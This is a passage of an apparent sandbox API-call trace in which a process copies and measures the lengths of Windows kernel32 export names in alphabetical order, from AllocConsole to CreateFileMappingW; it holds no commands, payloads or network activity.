[0184.477] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0184.477] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0184.477] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0184.477] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0184.477] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0184.477] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0184.477] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0184.477] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0184.477] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0184.477] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0184.477] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0184.477] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0184.477] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0184.477] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0184.477] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0184.477] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0184.477] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0184.477] lstrlenA (lpString="BACKUPREAD") returned 10 [0184.478] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0184.478] lstrlenA (lpString="BACKUPSEEK") returned 10 [0184.478] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0184.478] lstrlenA (lpString="BACKUPWRITE") returned 11 [0184.478] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0184.478] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0184.478] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0184.478] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0184.478] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0184.478] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0184.478] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0184.478] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0184.478] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0184.478] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0184.478] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0184.478] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0184.478] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0184.478] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0184.478] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0184.478] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0184.478] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0184.478] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0184.478] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0184.478] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0184.478] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0184.478] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0184.478] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0184.478] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0184.478] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0184.478] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0184.483] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0184.483] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0184.483] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0184.483] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0184.483] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0184.483] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0184.483] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0184.483] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0184.483] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0184.483] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0184.483] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0184.483] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0184.483] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0184.483] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0184.483] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0184.483] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0184.483] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0184.483] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0184.483] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0184.483] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0184.483] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0184.483] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0184.483] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0184.483] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0184.483] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0184.483] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0184.483] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0184.483] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0184.483] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0184.483] lstrlenA (lpString="BEEP") returned 4 [0184.483] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0184.483] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0184.483] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0184.483] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0184.483] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0184.484] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0184.484] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0184.484] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0184.484] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0184.484] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0184.484] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0184.484] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0184.484] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0184.484] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0184.484] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0184.484] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0184.484] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0184.484] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0184.484] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0184.484] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0184.484] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0184.484] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0184.484] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0184.484] lstrlenA (lpString="CANCELIO") returned 8 [0184.484] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0184.484] lstrlenA (lpString="CANCELIOEX") returned 10 [0184.484] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0184.484] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0184.484] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0184.484] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0184.484] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0184.484] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0184.484] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0184.484] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0184.484] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0184.484] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0184.484] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0184.484] lstrlenA (lpString="CHECKELEVATION") returned 14 [0184.484] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0184.484] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0184.484] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0184.485] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0184.485] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0184.485] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0184.485] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0184.485] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0184.485] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0184.485] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0184.485] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0184.485] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0184.485] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0184.485] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0184.485] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0184.485] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0184.485] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0184.485] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0184.485] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0184.485] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0184.485] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0184.485] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0184.485] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0184.485] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0184.485] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0184.485] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0184.485] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0184.485] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0184.485] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0184.485] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0184.485] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0184.485] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0184.485] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0184.485] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0184.485] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0184.485] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0184.485] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0184.485] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0184.485] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0184.485] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0184.486] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0184.486] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0184.486] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0184.486] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0184.486] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0184.486] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0184.486] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0184.486] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0184.486] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0184.486] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0184.486] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0184.486] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0184.486] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0184.486] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0184.486] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0184.486] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0184.486] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0184.486] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0184.486] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0184.486] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0184.486] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0184.486] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0184.486] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0184.486] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0184.486] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0184.486] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0184.486] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0184.486] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0184.486] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0184.486] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0184.486] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0184.486] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0184.486] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0184.486] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0184.486] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0184.486] lstrlenA (lpString="COPYCONTEXT") returned 11 [0184.486] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0184.487] lstrlenA (lpString="COPYFILEA") returned 9 [0184.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0184.487] lstrlenA (lpString="COPYFILEEXA") returned 11 [0184.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0184.487] lstrlenA (lpString="COPYFILEEXW") returned 11 [0184.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0184.487] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0184.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0184.487] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0184.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0184.487] lstrlenA (lpString="COPYFILEW") returned 9 [0184.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0184.487] lstrlenA (lpString="COPYLZFILE") returned 10 [0184.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0184.487] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0184.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0184.487] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0184.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0184.487] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0184.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0184.487] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0184.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0184.487] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0184.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0184.487] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0184.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0184.487] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0184.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0184.487] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0184.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0184.487] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0184.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0184.487] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0184.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0184.487] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0184.487] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0184.487] lstrlenA (lpString="CREATEEVENTA") returned 12 [0184.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0184.488] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0184.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0184.488] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0184.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0184.488] lstrlenA (lpString="CREATEEVENTW") returned 12 [0184.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0184.488] lstrlenA (lpString="CREATEFIBER") returned 11 [0184.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0184.488] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0184.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0184.488] lstrlenA (lpString="CREATEFILEA") returned 11 [0184.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0184.488] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0184.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0184.488] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0184.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0184.488] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0184.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: 